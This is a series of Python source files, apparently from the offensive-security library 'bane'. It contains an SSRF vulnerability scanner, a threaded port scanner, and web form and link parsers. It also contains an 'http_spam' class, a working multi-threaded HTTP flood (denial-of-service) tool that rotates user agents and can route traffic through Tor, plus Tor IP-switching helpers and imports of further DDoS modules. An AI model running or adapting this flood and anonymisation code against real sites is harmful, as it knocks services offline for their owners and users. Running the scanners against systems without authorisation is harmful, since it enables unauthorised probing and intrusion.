        js = js.replace('[][fill][constructor](', '')
        js = js[:-2]

        ev = 'return eval)()('

        if ev in js:
            js = js[(js.find(ev) + len(ev)):]

        return js

    def __mapping(self, js):
        '''
        Iterates over MAPPING and replaces every value found with
        its corresponding key

        Keyword arguments:
        js -- string containing Javascript encoded with JSFuck

        Returns:
        js -- string of decoded Javascript

        '''
        for key, value in sorted(
                self.MAPPING.items(), key=lambda x: len(x[1]), reverse=True):
            js = js.replace(value, key)

        return js

    def __fillMissingDigits(self):
        '''
        Calculates 0-9's encoded value and adds it to MAPPING

        '''
        for number in range(10):
            output = '+[]'

            if number > 0:
                output = '+!' + output

            for i in range(number - 1):
                output = '+!+[]' + output

            if number > 1:
                output = output[1:]

            self.MAPPING[str(number)] = '[' + output + ']'

    def __fillMissingChars(self):
        '''
        Iterates over MAPPING and fills missing character values with a string
        containing their ascii value represented in hex

        '''
        for key in self.MAPPING:
            if self.MAPPING[key] == self.USE_CHAR_CODE:
                hexidec = hex(ord(key[0]))[2:]

                digit_search = re.findall(r'\d+', hexidec)
                letter_search = re.findall(r'[^\d+]', hexidec)

                digit = digit_search[0] if digit_search else ''
                letter = letter_search[0] if letter_search else ''

                string = ('Function("return unescape")()("%%"+(%s)+"%s")'
                          % (digit, letter))

                self.MAPPING[key] = string

    def __replaceMap(self):
        '''
        Iterates over MAPPING from MIN to MAX and replaces value with values
        found in CONSTRUCTORS and SIMPLE, as well as using digitalReplacer and
        numberReplacer to replace numeric values

        '''
        def replace(pattern, replacement):
            return re.sub(pattern, replacement, value, flags=re.I)

        def digitReplacer(x):
            return self.MAPPING[x.group(1)]

        def numberReplacer(y):
            values = list(y.group(1))
            head = int(values[0])
            output = '+[]'

            values.pop(0)

            if head > 0:
                output = '+!' + output

            for i in range(1, head):
                output = '+!+[]' + output

            if head > 1:
                output = output[1:]

            return re.sub(r'(\d)', digitReplacer, '+'.join([output] + values))

        for i in range(self.MIN, self.MAX + 1):
            character = chr(i)
            value = self.MAPPING[character]

            original = ''

            if not value:
                continue

            while value != original:
                original = value

                for key, val in get_dict(self.CONSTRUCTORS):
                    value = replace(r'\b' + key, val + '["constructor"]')

                for key, val in get_dict(self.SIMPLE):
                    value = replace(key, val)

            value = replace(r'(\d\d+)', numberReplacer)
            value = replace(r'\((\d)\)', digitReplacer)
            value = replace(r'\[(\d)\]', digitReplacer)

            value = replace(r'GLOBAL', self.GLOBAL)
            value = replace(r'\+""', '+[]')
            value = replace(r'""', '[]+[]')

            self.MAPPING[character] = value

    def __replaceStrings(self):
        '''
        Replaces strings added in __replaceMap with there encoded values

        '''
        regex = r'[^\[\]\(\)\!\+]'

        # determines if there are still characters to replace
        def findMissing():
            done = False
            # python 2 workaround for nonlocal
            findMissing.missing = {}

            for key, value in get_dict(self.MAPPING):
                if re.findall(regex, value):
                    findMissing.missing[key] = value
                    done = True

            return done

        def mappingReplacer(x):
            return '+'.join(list(x.group(1)))

        def valueReplacer(x):
            x = x.group()
            return x if x in findMissing.missing else self.MAPPING[x]

        for key in self.MAPPING:
            self.MAPPING[key] = re.sub(r'\"([^\"]+)\"', mappingReplacer,
                                       self.MAPPING[key], flags=re.I)

        while findMissing():
            for key in findMissing.missing:
                value = self.MAPPING[key]
                value = re.sub(regex, valueReplacer, value)

                self.MAPPING[key] = value
                findMissing.missing[key] = value




from bane.scanners.vulnerabilities.utils import *


def ssrf_check(
    u,
    null_byte=False,
    link="http://www.google.com",
    signature="<title>Google</title>",
    proxy=None,
    proxies=None,
    timeout=25,
    user_agent=None,
    cookie=None,
    headers={}
):
    """
    this function is for FI vulnerability test using a link"""
    l = link
    if proxies:
        proxy = random.choice(proxies)
    if user_agent:
        us = user_agent
    else:
        us = random.choice(ua)
    if cookie:
        heads = {"User-Agent": us, "Cookie": cookie}
    else:
        heads = {"User-Agent": us}
    heads.update(
        {
            "Referer": u,
            "Origin": u.split("://")[0] + "://" + u.split("://")[1].split("/")[0],
        }
    )
    heads.update(headers)
    if "=" not in u:
        return (False, "")
    if null_byte == True:
        l += "%00"
    try:
        r = requests.get(
            u.format(l), headers=heads, proxies=proxy, timeout=timeout, verify=False
        )
        if (signature in r.text) or (r.status_code == 504):
            return (True, r.url)
    except Exception as e:
        if "Read timed out" in str(e):
            return (True, u.format(l))
    return (False, "")


def ssrf_urls(
    u,
    null_byte=False,
    link="http://www.google.com",
    timeout=120,
    signature="<title>Google</title>",
    proxy=None,
    proxies=None,
    user_agent=None,
    cookie=None,
    headers={}
):
    res = []
    if u.split("?")[0][-1] != "/" and "." not in u.split("?")[0].rsplit("/", 1)[-1]:
        u = u.replace("?", "/?")
    a = crawl(u, proxy=proxy, timeout=timeout, cookie=cookie, user_agent=user_agent,headers=headers)
    l = []
    d = a.values()
    for x in d:
        if len(x[3]) > 0:
            l.append(x)
    o = []
    for x in l:
        ur = x[1]
        if ur.split("?")[0] not in o:
            o.append(ur.split("?")[0])
            if (
                ur.split("?")[0][-1] != "/"
                and "." not in ur.split("?")[0].rsplit("/", 1)[-1]
            ):
                ur = ur.replace("?", "/?")
            for y in x[3]:
                if valid_parameter(y[1]) == True:
                    trgt = ur.replace(y[0] + "=" + y[1], y[0] + "={}")
                    q = ssrf_check(
                        trgt,
                        null_byte=null_byte,
                        proxy=proxy,
                        link=link,
                        signature=signature,
                        proxies=proxies,
                        timeout=timeout,
                        cookie=cookie,
                        user_agent=user_agent,
                        headers=headers
                    )
                    if q[0] == True:
                        if q[1] not in res:
                            res.append(q[1])
    return res



def ssrf(
    u,
    max_pages=5,
    logs=True,
    null_byte=False,
    link="http://www.google.com",
    timeout=120,
    signature="<title>Google</title>",
    proxy=None,
    proxies=None,
    user_agent=None,
    cookie=None,
    pages=[],
    headers={}
):
    l=[]
    if pages==[]:
        pages=spider_url(u,cookie=cookie,max_pages=max_pages,timeout=timeout,user_agent=user_agent,proxy=proxy,headers=headers)
    for x in pages:
        if logs==True:
            print('\n\nPage: {}\n'.format(x))
        result=ssrf_urls(x,
                        null_byte=null_byte,
                        link=link,
                        timeout=timeout,
                        signature=signature,
                        proxy=proxy,
                        proxies=proxies,
                        user_agent=user_agent,
                        cookie=cookie,
                        headers=headers)
        if logs==True:
            for r in result:
                print(r)
        l.append({'page':x,'result':result})
    return  [x for x in l if x['result']!=[]]




from bane.gather_info.utils import *

def get_local_ip():
    try:
        return [
            l
            for l in (
                [
                    ip
                    for ip in socket.gethostbyname_ex(socket.gethostname())[2]
                    if not ip.startswith("127.")
                ][:1],
                [
                    [
                        (s.connect(("8.8.8.8", 53)), s.getsockname()[0], s.close())
                        for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]
                    ][0][1]
                ],
            )
            if l
        ][0][0]
    except:
        return "127.0.0.1"


def host_alive(target):
    if os.name == "nt":
        r = os.popen("ping -n 1 " + target).readlines()
    else:
        r = os.popen("ping -c 1 " + target).readlines()
    if "TTL" in str(r):
        r = None
        return True
    r = None
    return False

def close_socket(soc):
    try:
        soc.close()
    except:
        pass

def tcp_scan(ip, port=1, timeout=2, retry=1, check_open=False):
    s=socket.socket()
    s.settimeout(timeout)
    try:
        connection=s.connect_ex((ip,port))
        s.close()
        if connection==0:
            close_socket(s)
            return True
    except:
        pass
    close_socket(s)
    return False
    """syn = IP(dst=ip) / TCP(dport=port, flags="S")
    ans, unans = sr(syn, timeout=timeout, retry=retry, verbose=0)
    for sent, received in ans:
            print(port,received[TCP].flags)
        #if check_open == True:
            if received[TCP].flags == 18:
                return True
            else:
                return False
            '''if received[TCP].flags == "RA" or received[TCP].flags == "SA":
            return True'''
    return False"""


class port_scan:
    __slots__ = ["result"]

    def scan(self,target,port,check_open,timeout,retry):
        a = tcp_scan(
            target,
            port=int(port),
            check_open=check_open,
            timeout=timeout,
            retry=retry,
        )
        if a == True:
            self.result.update({str(port): "open"})
        else:
            self.result.update({str(port): "closed"})

    def __init__(
        self,
        u,
        ports=[21, 22, 23, 25, 43, 53, 80, 443, 2082, 3306],
        threads_daemon=True,
        timeout=3,
        retry=0,
        check_open=True,
    ):
            self.result={}
        #try:
            for x in ports:
                t = threading.Thread(target=self.scan,args=(u,x,check_open,timeout,retry))#,kwargs={"port": self.por[x]})
                t.daemon = threads_daemon
                t.start()
                #thr.append(t)
                time.sleep(0.001)
            while len(self.result) != len(ports):
                time.sleep(0.1)
        #except:
         #   pass
            """for x in self.__dict__:
            if x != "result":
                self.__dict__[x] = None"""




from bane.gather_info.domains import *
from bane.gather_info.ips import *
from bane.gather_info.network import *
from bane.gather_info.subdomains import *
from bane.gather_info.urls import *
from bane.gather_info.google_dorking import *


from bane.ddos.utils import *

class http_spam(DDoS_Class):
    def __init__(
        self,
        u,
        p=80,
        cookie=None,
        user_agents=None,
        method=3,
        threads_daemon=True,
        paths=["/"],
        threads=256,
        post_min=5,
        post_max=10,
        post_field_max=100,
        post_field_min=50,
        timeout=5,
        round_min=1000,
        round_max=10000,
        interval=0.001,
        duration=60,
        logs=False,
        tor=False,
    ):
        self.logs = logs
        self.cookie = cookie
        self.user_agents = user_agents
        if not self.user_agents or len(self.user_agents) == 0:
            self.user_agents = ua
        self.method = method
        self.stop = False
        self.counter = 0
        self.start = time.time()
        self.target = u
        self.duration = duration
        self.port = p
        self.timeout = timeout
        self.tor = tor
        self.interval = interval
        self.round_min = round_min
        self.round_max = round_max
        self.paths = paths
        self.post_min = post_min
        self.post_max = post_max
        self.post_field_max = post_field_max
        self.post_field_min = post_field_min
        for x in range(threads):
            try:
                t = threading.Thread(target=self.attack)
                t.daemon = threads_daemon
                t.start()
            except:
                pass

    def attack(self):
        try:
            time.sleep(1)
            while True:
                if (
                    int(time.time() - self.start) >= self.duration
                ):  # this is a safety mechanism so the attack won't run forever
                    break
                if self.stop == True:
                    break
                try:
                    s = socks.socksocket(socket.AF_INET, socket.SOCK_STREAM)
                    if self.tor == False:
                        s.settimeout = self.timeout
                    if self.tor == True:
                        s.setproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050, True)
                    s.connect((self.target, self.port))
                    if (self.port == 443) or (self.port == 8443):
                        s = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
                    for l in range(random.randint(self.round_min, self.round_max)):
                        if self.method == 3:
                            ty = random.randint(1, 2)
                        else:
                            ty = self.method
                        if ty == 1:
                            req = "GET"
                        else:
                            req = "POST"
                        m = setup_http_packet(
                            self.target,
                            ty,
                            self.paths,
                            self.post_field_min,
                            self.post_field_max,
                            self.post_min,
                            self.post_max,
                            self.cookie,
                            self.user_agents,
                        )
                        try:
                            if self.stop == True:
                                break
                            s.send(m.encode("utf-8"))
                            self.counter += 1
                            if self.logs == True:
                                sys.stdout.write(
                                    "\rRequest: {} | Type: {} | Bytes: {}   ".format(
                                        self.counter, req, len(m)
                                    )
                                )
                                sys.stdout.flush()
                                # print("Request: {} | Type: {} | Bytes: {}".format(http_counter,req,len(m)))
                            time.sleep(self.interval)
                        except:
                            break
                        time.sleep(self.interval)
                    s.close()
                except:
                    pass
                time.sleep(0.1)
            self.kill()
        except:
            pass


from bane.cryptographers.utils import *

def sha512_string(w, encode=None):
    if w:
        if encode:
            w.encode(encode)
        """
   function to return sha512 encrypted string
  """
        return hashlib.sha512(w).hexdigest()


def sha512_file(f):
    if f:
        with open(f, "rb") as f:
            w = f.read()
        f.close()
        return sha512_string(w)


def dsha512(w, z):
    if w and z:
        w = hashlib.sha512(w).hexdigest()
        if w == z:
            return True
        return False



import os, sys, time

try:
    import stem
    from stem import Signal
    from stem.control import Controller
except:
    stem=None


def tor_switch_no_password(interval=30, logs=True):
    """
     this function is for auto ip switching of tor's nodes, it doesnt work on windows because it use the command on linux to restart tor' service in a chosen interval.

    it takes the following parameters:

    new: (set by default to: 30) the interval in seconds between switching tor's nodes
    logs: (set by default to: True) showing the screen prints

    example:

    >>>import bane
    >>>bane.torswitch1(new=15)
    """
    i = True
    if (sys.platform == "win32") or (sys.platform == "win64") or stem==None:
        print("[-]This option is not for windows")
        i = False
    if i == True:
        while True:
            try:
                os.system("systemctl reload tor")
                if logs == True:
                    print("IP changed, sleeping for {} seconds...".format(interval))
                time.sleep(interval)
            except KeyboardInterrupt:
                break


def tor_switch_with_password(interval=30, password=None, p=9051, logs=True):
    """
    this one does work on any OS, you just need to activate tor's control port 9051 and set the password.

    it takes the next parameters:

    new: (set by default to: 30) the interval in seconds between switching tor's nodes
    password: your password
    p: (set by default to: 9051) tor's control port
    logs: (set by default to: True) showing the screen prints"""
    if password == None:
        print("[-]you need to put your control port's password for authentication!!!")
    else:
        while True:
            try:
                with Controller.from_port(port=p) as controller:
                    controller.authenticate(password=password)
                    controller.signal(Signal.NEWNYM)
                    controller.close()
                if logs == True:
                    print("IP changed, sleeping for {} seconds...".format(interval))
                time.sleep(interval)
            except KeyboardInterrupt:
                break



"""


The rest of the DDoS tools have been removed and will be added slowly in the coming versions :) Be patient !!


"""
from bane.ddos.http_spam  import *
from bane.ddos.proxies_hammer  import *
from bane.ddos.proxies_http_spam  import *
from bane.ddos.proxies_xerxes  import *
from bane.ddos.slow_read  import *
from bane.ddos.tcp  import *
from bane.ddos.torshammer  import *
from bane.ddos.udp  import *
from bane.ddos.vse  import *
from bane.ddos.xerxes  import *



import requests, random, re, time, furl, sys, datetime , string,json,ast

try:
    import jsbeautifier
except:
    pass
if sys.version_info < (3, 0):
    from urlparse import urlparse,urljoin
    from urllib import unquote as url_decode
else:
    from urllib.parse import urlparse,urljoin
    from urllib.parse import unquote as url_decode



import urllib3



from bane.cryptographers.hasher import base64_decode
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
import bs4
from bs4 import BeautifulSoup
from bane.common.payloads import *
from bane.gather_info.info_s import extract_root_domain



def generate_random_url():
    protocols = ["http", "https"]
    protocol = random.choice(protocols)
    domain = random.choice(domainl)
    return "{}://{}/".format(protocol,domain)


def generate_random_phone_number(pattern):
    phone_number = ""
    for char in pattern:
        if char == "X":
            random_digit = str(random.randint(0, 9))
            phone_number += random_digit
        else:
            phone_number += char
    return phone_number

def generate_random_html_input_color():
    # Generate random RGB values
    r = random.randint(0, 255)
    g = random.randint(0, 255)
    b = random.randint(0, 255)

    # Convert RGB to hexadecimal
    color_hex = "#{:02X}{:02X}{:02X}".format(r, g, b)
    return color_hex


def random_date(start_date, end_date):
    if start_date==end_date:
        return start_date
    start_date = datetime.datetime.strptime(start_date, "%Y-%m-%d")
    end_date = datetime.datetime.strptime(end_date, "%Y-%m-%d")
    
    time_between_dates = end_date - start_date
    days_between_dates = time_between_dates.days
    random_number_of_days = random.randrange(days_between_dates)
    
    random_date = start_date + datetime.timedelta(days=random_number_of_days)
    return random_date.strftime("%Y-%m-%d")


def spider_url(base_url, include_id=False,max_pages=50,timeout=15,cookie=None,user_agent=None,proxy=None,headers={}):
    domain=base_url.split('://')[1].split('/')[0]
    h={}
    if cookie:
        h.update({'Cookie':cookie})
    if user_agent:
        h.update({'User-Agent':user_agent})
    else:
        h.update({'User-Agent':random.choice(ua)})
    h.update(headers)
    visited_urls = set()
    urls_to_visit = [base_url]
    collected_urls = set()
    root_urls=[]

    while urls_to_visit and len(collected_urls) < max_pages:
        url = urls_to_visit.pop(0)
        try:
            response = requests.get(url,headers=h,timeout=timeout,proxies=proxy,verify=False)
            response.raise_for_status()  # Check for any request errors

            # Parse the HTML content
            soup = BeautifulSoup(response.content, 'html.parser')

            # Extract all links from the page
            for anchor_tag in soup.find_all('a', href=True):
                href = anchor_tag['href']
                absolute_url = urljoin(url, href)
                try:
                    this_domain=absolute_url.split('://')[1].split('/')[0]
                except:
                    this_domain=''

                if absolute_url not in visited_urls and absolute_url.split('?')[0].split('#')[0] not in root_urls and domain == this_domain:
                    visited_urls.add(absolute_url)
                    urls_to_visit.append(absolute_url)
                    root_urls.append(absolute_url.split('?')[0].split('#')[0])
            if include_id==True:
                collected_urls.add({'url':url,'id':anchor_tag.get('id','')})
            else:
                collected_urls.add(url)
            #print(len(collected_urls))

        except requests.exceptions.RequestException as e:
            print("Error fetching URL: {}".format(e))

    return list(collected_urls)



def url_to_get_form(u,url_id):
    #print('&'.join(u.split('?')[1:]).replace('?','&').split('&'))
    #print(u.split('?')[1].split('&'))
    inputs=[]
    for x in '&'.join(u.split('?')[1:]).replace('?','&').split('&'):
        try:
            inputs.append({'name':x.split('=')[0],'type':'text','value':x.split('=')[1]})
        except:
            inputs.append({'name':x.split('=')[0],'type':'text','value':''})
    #inputs=[ {'name':x.split('=')[0],'type':'text','value':x.split('=')[1]} for x in u.split('?')[1].split('&')]
    return {
                    "inputs": inputs,
                    "action": u.split('?')[0],
                    "enctype": 'application/x-www-form-urlencoded',
                    "method": 'get',
                    "id":url_id,
                    "hidden_values": [],
                    "is_url":True
                }


def get_links_from_page_source(soup,url,url_id):
    if url.endswith('/')==False:
        url+='/'
    domain=url.split('/')[0] if url.startswith('http')==False else url.split('://')[1].split('/')[0]
    l=soup.find_all('a')
    links=[{'url':x['href'].replace('&amp;','&'),'id':x.get('id','')} for x in l if x.has_attr('href')]
    media_tags = soup.find_all(['img', 'audio', 'video', 'source','embed'])
    links+=[{'url':x['src'].replace('&amp;','&'),'id':x.get('id','') } for x in media_tags if x.has_attr('src')]
    links.append({'url':url,'id':url_id})
    #print(links)
    #links_list=[]
    root_links=[]
    forms=[]
    for l in links:
        x=l['url']
        l_id=l['id']
        if '?' in x and x.split('?')[0] not in root_links:
            a=urljoin(url, x)
            #print(a)
            if a.startswith(url.split(domain)[0]+domain)==True:
                forms.append(url_to_get_form(a,l_id))
                root_links.append(x.split('?')[0])
    return forms



def remove_html_comments(text):
    return re.sub(r"<!--(.|\s|\n)*?-->", "", text, flags=re.DOTALL)


def inputs(
    u,
    html_comments=False,
    value=False,
    timeout=10,
    user_agent=None,
    bypass=False,
    proxy=None,
    cookie=None,
):
    """
     this function is to get the names and values of input fields on a given webpage to scan.

     it takes 4 arguments:

     u: the page's link (http://...)
     value: (set by default to: False) to return the value of the fields set it to:True then the field's name and value will be string of 2
     values sperated by ":"
     timeout: (set by default to: 10) timeout flag for the request
     bypass: (set by default to: False) to bypass anti-crawlers

    usage:

    >>>import bane
    >>>link='http://www.example.com'
    >>>bane.inputs(link)
    ['email','password','rememberme']
    >>>a=bane.inputs(link,value=True)
    ['email','password','rememberme:yes','rememberme:no']

    """
    if user_agent:
        us = user_agent
    else:
        us = random.choice(ua)
    if bypass == True:
        u += "#"
    if cookie:
        hea = {"User-Agent": us, "Cookie": cookie}
    else:
        hea = {"User-Agent": us}
    l = []
    try:
        c = requests.get(
            u, headers=hea, proxies=proxy, timeout=timeout, verify=False
        ).text
        if html_comments == False:
            c = remove_html_comments(c)
        soup = BeautifulSoup(c, "html.parser")
        p = soup.find_all("textarea")
        for r in p:
            if r.has_attr("name"):
                s = r.get("name")
                v = r.get("value")
                if v == None:
                    v = ""
            if value == True:
                y = s + ":" + v
            else:
                y = s
            if y not in l:
                l.append(y)
        p = soup.find_all("input")
        for r in p:
            v = ""
            if r.has_attr("name"):
                s = str(r)
                s = s.split('name="')[1].split(",")[0]
                s = s.split('"')[0].split(",")[0]
                if r.has_attr("value") and (value == True):
                    v = str(r)
                    v = v.split('value="')[1].split(",")[0]
                    v = v.split('"')[0].split(",")[0]
            if value == True:
                y = s + ":" + v
            else:
                y = s
            if y not in l:
                l.append(y)
    except Exception as e:
        pass
    return l


def forms(
    u,
    value=True,
    html_comments=False,
    user_agent=None,
    timeout=10,
    bypass=False,
    proxy=None,
    cookie=None,
):
    """
    same as "inputs" function but it works on forms input fields only
    """
    if urlparse(u).path == "":
        u += "/"
    if user_agent:
        us = user_agent
    else:
        us = random.choice(ua)
    if bypass == True:
        u += "#"
    if cookie:
        hea = {"User-Agent": us, "Cookie": cookie}
    else:
        hea = {"User-Agent": us}
    l = []
    fom = []
    try:
        c = requests.get(
            u, headers=hea, proxies=proxy, timeout=timeout, verify=False
        ).text
        if html_comments == False:
            c = remove_html_comments(c)
        soup = BeautifulSoup(c, "html.parser")
        i = soup.find_all("form")
        for f in i:
            ac = f.get("action")
            if not ac:
                ac = u
            """if len(ac)==0:
    ac=u
   if ac[0]=="/":
    url_o="/".join(u.split('/')[:-1])
    ac=url_o+ac
   if ac[:4]!="http":
    url_o="/".join(u.split('/')[:-1])
    ac=url_o+"/"+ac"""
            if "://" not in ac:
                ur = u[: u.rfind("/")]
                if ac[0] == "/":
                    ac = ac[1 : len(ac)]
                ac = ur + "/" + ac
            me = f.get("method")
            if not me:
                me = "get"
            if len(me) == 0:
                me = "get"
            me = me.lower()
            p = f.find_all("textarea")
            for r in p:
                if r.has_attr("name"):
                    s = r.get("name")
                    v = r.get("value")
                    if v == None:
                        v = ""
                if value == True:
                    y = s + ":" + v
                else:
                    y = s
                if y not in l:
                    l.append(y)
            p = f.find_all("input")
            for r in p:
                if r.has_attr("name"):
                    s = r.get("name")
                    v = r.get("value")
                    if v == None:
                        v = ""
                if value == True:
                    y = s + ":" + v
                else:
                    y = s
                if y not in l:
                    l.append(y)
            fom.append({"inputs": l, "action": ac, "method": me})
            l = []
    except Exception as e:
        pass
    return fom


def sort_inputs(l):
    a = []
    d = []
    for x in l:
        if x["type"] not in [u"radio", u"checkbox"]:
            d.append(x)
        if x["name"] not in a and (x["type"] == u"radio" or x["type"] == u"checkbox"):
            a.append(x["name"])
    for x in a:
        d.append(
            {
                "type": [i["type"] for i in l if i["name"] == x][0],
                "name": x,
                "value": [i["value"] for i in l if i["name"] == x],
            }
        )
    return d


def forms_parser(
    u,
    html_comments=False,
    user_agent=None,
    timeout=10,
    bypass=False,
    proxy=None,
    cookie=None,
    include_links=True,
    headers={}
):
    """
    same as "forms" function but it return detailed information about all forms in a given page
    """
    if urlparse(u).path == "":
        u += "/"
    domain=u.split('://')[1].split('/')[0]
    base_url=u.split('://')[0]+domain
    if user_agent:
        us = user_agent
    else:
        us = random.choice(ua)
    if bypass == True:
        u += "#"
    if cookie:
        hea = {"User-Agent": us, "Cookie": cookie}
    else:
        hea = {"User-Agent": us}
    hea.update(headers)
    l = []
    fom = []
    try:
        c = requests.get(
            u, headers=hea, proxies=proxy, timeout=timeout, verify=False
        ).text
        if html_comments == False:
            c = remove_html_comments(c)
        soup = BeautifulSoup(c, "html.parser")
        i = soup.find_all("form")
        for f in i:
            form_id=f.get('id','')
            try:
                tb_inputs = f.find_all("table")[0].find_all("input")
            except:
                tb_inputs = []
            try:
                tb_textareas = f.find_all("table")[0].find_all("textarea")
            except:
                tb_textareas = []
            try:
                tb_selects = f.find_all("table")[0].find_all("select")
            except:
                tb_selects = []
            ac = urljoin(u, f.get("action",''))
            enc_ty = f.get("enctype", "application/x-www-form-urlencoded")
            if not ac:
                ac = u
            """if len(ac)==0:
    ac=u
   if ac[0]=="/":
    url_o="/".join(u.split('/')[:-1])
    ac=url_o+ac
   if ac[:4]!="http":
    url_o="/".join(u.split('/')[:-1])
    ac=url_o+"/"+ac"""
            if "://" not in ac:
                ur = u[: u.rfind("/")]
                if ac[0] == "/":
                    ac = ac[1 : len(ac)]
                ac = ur + "/" + ac
            me = f.get("method", "get")
            if not me:
                me = "get"
            if len(me) == 0:
                me = "get"
            me = me.lower()
            """radios={}
            checkxoes={}"""
            p = f.find_all("textarea") + tb_textareas
            for r in p:
                required=False
                if 'required' in r.attrs:
                    required=True
                if r.has_attr("name"):
                    s = r.get("name")
                    v = r.renderContents().decode().split("</textarea>")[0]
                    typ = r.get("type", "textarea").lower()
                    max_size=r.get('maxlength',64)
                    if r.get('size',0)!=0:
                            max_size= r.get('size',64)
                    y = {"name": s, "value": v, "type": typ,'max':max_size,'min':r.get('minlength',1),'required':required}
                    if y not in l:
                        l.append(y)
            h_v = {}
            p = f.find_all("input") + tb_inputs
            for r in p:
                required=False
                if 'required' in r.attrs:
                    required=True
                if r.has_attr("name"):
                    s = r.get("name")
                    v = r.get("value", "")
                    typ = r.get("type", "text").lower()
                    y = {"name": s, "value": v, "type": typ,'required':required}
                    if y['type'] in ['text','password','email','url','tel','search']:
                        max_size=r.get('maxlength',64)
                        if r.get('size',0)!=0:
                            max_size= r.get('size',64)
                        y.update({'max':int(max_size),'min':int(r.get('minlength',1))})
                    elif y['type']=='number':
                        y.update({'max':int(r.get('max',10)),'min':int(r.get('min',1))})
                    elif y['type']=='date':
                        y.update({'max':r.get('max',datetime.datetime.today().strftime("%Y-%m-%d")),'min':r.get('min',datetime.datetime.today().strftime("%Y-%m-%d"))})
                    elif y['type']=='file':
                        y.update({'accept':[ x.replace('.','').strip() for x in y.get('accept','.png').split(',')]})
                    """elif y['type']=='radio':
                        if y['name'] not in radios:
                            radios[y['name']]=[]
                        radios[y['name']].append(y)
                    elif y['type']=='checkbox':
                        if y['name'] not in checkxoes:
                            checkxoes[y['name']]=[]
                        checkxoes[y['name']].append(y)"""
                    if typ.lower() == "hidden":
                        h_v.update({s: v})
                    if y not in l :#and y['name'] not in radios and y['name'] not in checkxoes:
                        l.append(y)
            p = f.find_all("select") + tb_selects
            opts = []
            for r in p:
                required=False
                if 'required' in r.attrs:
                    required=True
                if r.has_attr("name"):
                    s = r.get("name")
                    for x in r.find_all("option"):
                        opts.append(x.text)
                    y = {"name": s, "value": opts, "type": "select",'required':required}
                    if y not in l:
                        l.append(y)
            """for x in radios:
                l.append({'name':x,'type':'radio','value':[i['value'] for i in radios[x]]})
            for x in checkxoes:
                l.append({'name':x,'type':'checkbox','value':[i['value'] for i in checkxoes[x]]})"""
            fom.append(
                {
                    'id':form_id,
                    "inputs": sort_inputs(l),
                    "action": ac.lower(),
                    "enctype": enc_ty.lower(),
                    "method": me.lower(),
                    "hidden_values": h_v,
                    "is_url":False
                }
            )
            l = []
    except Exception as e:
        pass
    if include_links==True:
        fom+=get_links_from_page_source(soup,u,'')
    return fom


def forms_parser_text(u, text, html_comments=False,include_links=True):
    """
    same as "forms" function but it return detailed information about all forms in a given page
    """
    if urlparse(u).path == "":
        u += "/"
    l = []
    fom = []
    try:
        c = text
        if html_comments == False:
            c = remove_html_comments(c)
        soup = BeautifulSoup(c, "html.parser")
        i = soup.find_all("form")
        for f in i:
            form_id=f.get('id','')
            try:
                tb_inputs = f.find_all("table")[0].find_all("input")
            except:
                tb_inputs = []
            try:
                tb_textareas = f.find_all("table")[0].find_all("textarea")
            except:
                tb_textareas = []
            try:
                tb_selects = f.find_all("table")[0].find_all("select")
            except:
                tb_selects = []
            ac = urljoin(u, f.get("action",''))
            enc_ty = f.get("enctype", "application/x-www-form-urlencoded").lower()
            if not ac:
                ac = u
            """if len(ac)==0:
    ac=u
   if ac[0]=="/":
    url_o="/".join(u.split('/')[:-1])
    ac=url_o+ac
   if ac[:4]!="http":
    url_o="/".join(u.split('/')[:-1])
    ac=url_o+"/"+ac"""
            if "://" not in ac:
                ur = u[: u.rfind("/")]
                if ac[0] == "/":
                    ac = ac[1 : len(ac)]
                ac = ur + "/" + ac
            me = f.get("method", "get").lower()
            if not me:
                me = "get"
            if len(me) == 0:
                me = "get"
            me = me.lower()
            """radios={}
            checkxoes={}"""
            p = f.find_all("textarea") + tb_textareas
            for r in p:
                required=False
                if 'required' in r.attrs:
                    required=True
                if r.has_attr("name"):
                    s = r.get("name")
                    v = r.renderContents().decode().split("</textarea>")[0]
                    typ = r.get("type", "textarea").lower()
                    max_size=r.get('maxlength',64)
                    if r.get('size',0)!=0:
                            max_size= r.get('size',64)
                    y = {"name": s, "value": v, "type": typ,'max':max_size,'min':r.get('minlength',1),'required':required}
                    if y not in l:
                        l.append(y)
            h_v = {}
            p = f.find_all("input") + tb_inputs
            for r in p:
                required=False
                if 'required' in r.attrs:
                    required=True
                if r.has_attr("name"):
                    s = r.get("name")
                    v = r.get("value", "")
                    typ = r.get("type", "text").lower()
                    y = {"name": s, "value": v, "type": typ,'required':required}
                    if y['type'] in ['text','password','email','url','tel','search']:
                        max_size=r.get('maxlength',64)
                        if r.get('size',0)!=0:
                            max_size= r.get('size',64)
                        y.update({'max':int(max_size),'min':int(r.get('minlength',1))})
                    elif y['type']=='number':
                        y.update({'max':int(r.get('max',64)),'min':int(r.get('min',1))})
                    elif y['type']=='date':
                        y.update({'max':r.get('max',datetime.datetime.today().strftime("%Y-%m-%d")),'min':r.get('min',datetime.datetime.today().strftime("%Y-%m-%d"))})
                    elif y['type']=='file':
                        y.update({'accept':[ x.replace('.','').strip() for x in y.get('accept','.png').split(',')]})
                    """elif y['type']=='radio':
                        if y['name'] not in radios:
                            radios[y['name']]=[]
                        radios[y['name']].append(y)
                    elif y['type']=='checkbox':
                        if y['name'] not in checkxoes:
                            checkxoes[y['name']]=[]
                        checkxoes[y['name']].append(y)"""
                    if typ.lower() == "hidden":
                        h_v.update({s: v})
                    if y not in l :#and y['name'] not in radios and y['name'] not in checkxoes:
                        l.append(y)
            p = f.find_all("select") + tb_selects
            opts = []
            for r in p:
                required=False
                if 'required' in r.attrs:
                    required=True
                if r.has_attr("name"):
                    s = r.get("name")
                    for x in r.find_all("option"):
                        opts.append(x.text)
                    y = {"name": s, "value": opts, "type": "select",'required':required}
                    if y not in l:
                        l.append(y)
            """for x in radios:
                l.append({'name':x,'type':'radio','value':[i['value'] for i in radios[x]]})
            for x in checkxoes:
                l.append({'name':x,'type':'checkbox','value':[i['value'] for i in checkxoes[x]]})"""
            fom.append(
                {
                    'id':form_id,
                    "inputs": sort_inputs(l),
                    "action": ac,
                    "enctype": enc_ty,
                    "method": me,
                    "hidden_values": h_v,
                    "is_url":False
                }
            )
            l = []
    except Exception as e:
        pass #raise(e)
    if include_links==True:
        fom+=get_links_from_page_source(soup,u,'')
    return fom


def cookies_to_dict(cookies):
    d = {}
    a = cookies.split(";")
    for x in a:
        if "=" in x:
